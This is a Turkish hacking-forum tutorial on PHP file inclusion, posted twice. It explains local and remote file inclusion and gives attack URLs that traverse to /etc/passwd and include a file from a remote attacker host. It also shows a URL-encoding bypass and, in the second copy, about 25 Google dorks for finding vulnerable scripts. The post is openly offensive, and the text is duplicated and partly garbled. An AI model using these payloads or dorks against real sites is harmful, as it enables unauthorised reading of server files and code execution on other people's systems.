Selamlar Saygılar Arkadaşlar ;
Ben Turk Devilz bugünkü makalemde sizlere File İnclusion’u anlatacağım . Konumu okudğunuz için teşekkür eder. Hepinizden
1 yorumu çok görmemenizi umarım
##########################################################################################################################
Nedir Bu File İnclusion ?
File Inclusion açığı bir saldırganın genellikle hedef uygulamada uygulanan bir "dinamik dosya dahil" mekanizmalarında oluşan
istismar, bir dosya eklemek için izin verir. Güvenlik açığı nedeniyle uygun doğrulama olmadan, kullanıcı tarafından
sağlanan girdi kullanımı nedeniyle oluşur. Bu dosyasının içeriğini çıkış ancak şiddetine bağlı olarak bir şey yol
açabilir, bu da yol açabilir Web sunucu üzerinde kod yürütülmesine ile sağlanır.
##########################################################################################################################
Kaç Kısımdan Oluşur ?
Dosya dahil açığı yani File İnclusion iki türde olabilir:
Local File İncluasion Yani Yerel Sunucudan,
Remote File İnclusion Yani Uzaktan Dosya Ekleme ,
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Peki bu Açık Türleri Nerelerde Aranır?
Arkadaşlar bu açıklar genellikle id değerlerinde aranır, search kısmı ziyaretçi defteri gibi kullanıcı girdisi olan
yerlere bakılmaz.Direk id değerine bakılır . He Bide Scriptte bakarız) Bide İşte sadece Php Scriptlerde bulunur.
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Hedef Sitede Gösterimi ?
http://türkdevilz.com/index.php?file=contactus.php
http://türkdevilz.com/index.php?file=../../../../etc/passwd Bişi oldu oda ne Hata vermiş kerata)
http://türkdevilz.com/index.php?file=http://şeladrediniyaz.com.tr.gg)
Tabi arkadaşlar her hack yönteminin bir ByPass yöntemi olduğu gibi bununda var ;
ByPass İsmi: Url Encode
Nasıl Yapılır: ’/’ Bunun Encode hali budur ’%2F’ Yani ../../../../etc/passwd Kodu Bu şekilde değitiriyoruz.
’..%2F..%2F..%2F..%2Fetc%2Fpasswd’ Olarak Eklediğiniz zaman etkili bir Bypass yapmış olursunuz.
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Bu Açıkla İlgili Dorklar İse ?
Bu Dorkları dork oluşturma mantığınıza göre değiştirebilirsiniz arkadaşlar .
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Anlamadığınız Her Türlü Soruya Pmve sosyal medya hesaplarımdan sorabilirsiniz.
Selametle // Türk Devilz
Ben Turk Devilz bugünkü makalemde sizlere File İnclusion’u anlatacağım . Konumu okudğunuz için teşekkür eder. Hepinizden
1 yorumu çok görmemenizi umarım
##########################################################################################################################
Nedir Bu File İnclusion ?
File Inclusion açığı bir saldırganın genellikle hedef uygulamada uygulanan bir "dinamik dosya dahil" mekanizmalarında oluşan
istismar, bir dosya eklemek için izin verir. Güvenlik açığı nedeniyle uygun doğrulama olmadan, kullanıcı tarafından
sağlanan girdi kullanımı nedeniyle oluşur. Bu dosyasının içeriğini çıkış ancak şiddetine bağlı olarak bir şey yol
açabilir, bu da yol açabilir Web sunucu üzerinde kod yürütülmesine ile sağlanır.
##########################################################################################################################
Kaç Kısımdan Oluşur ?
Dosya dahil açığı yani File İnclusion iki türde olabilir:
Local File İncluasion Yani Yerel Sunucudan,
Remote File İnclusion Yani Uzaktan Dosya Ekleme ,
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Peki bu Açık Türleri Nerelerde Aranır?
Arkadaşlar bu açıklar genellikle id değerlerinde aranır, search kısmı ziyaretçi defteri gibi kullanıcı girdisi olan
yerlere bakılmaz.Direk id değerine bakılır . He Bide Scriptte bakarız
) Bide İşte sadece Php Scriptlerde bulunur.&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Hedef Sitede Gösterimi ?
http://türkdevilz.com/index.php?file=contactus.php
http://türkdevilz.com/index.php?file=../../../../etc/passwd Bişi oldu oda ne Hata vermiş kerata
)http://türkdevilz.com/index.php?file=http://şeladrediniyaz.com.tr.gg
)Tabi arkadaşlar her hack yönteminin bir ByPass yöntemi olduğu gibi bununda var ;
ByPass İsmi: Url Encode
Nasıl Yapılır: ’/’ Bunun Encode hali budur ’%2F’ Yani ../../../../etc/passwd Kodu Bu şekilde değitiriyoruz.
’..%2F..%2F..%2F..%2Fetc%2Fpasswd’ Olarak Eklediğiniz zaman etkili bir Bypass yapmış olursunuz.
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Bu Açıkla İlgili Dorklar İse ?
Kod:
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=Bu Dorkları dork oluşturma mantığınıza göre değiştirebilirsiniz arkadaşlar .
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Anlamadığınız Her Türlü Soruya Pmve sosyal medya hesaplarımdan sorabilirsiniz.
Selametle // Türk Devilz
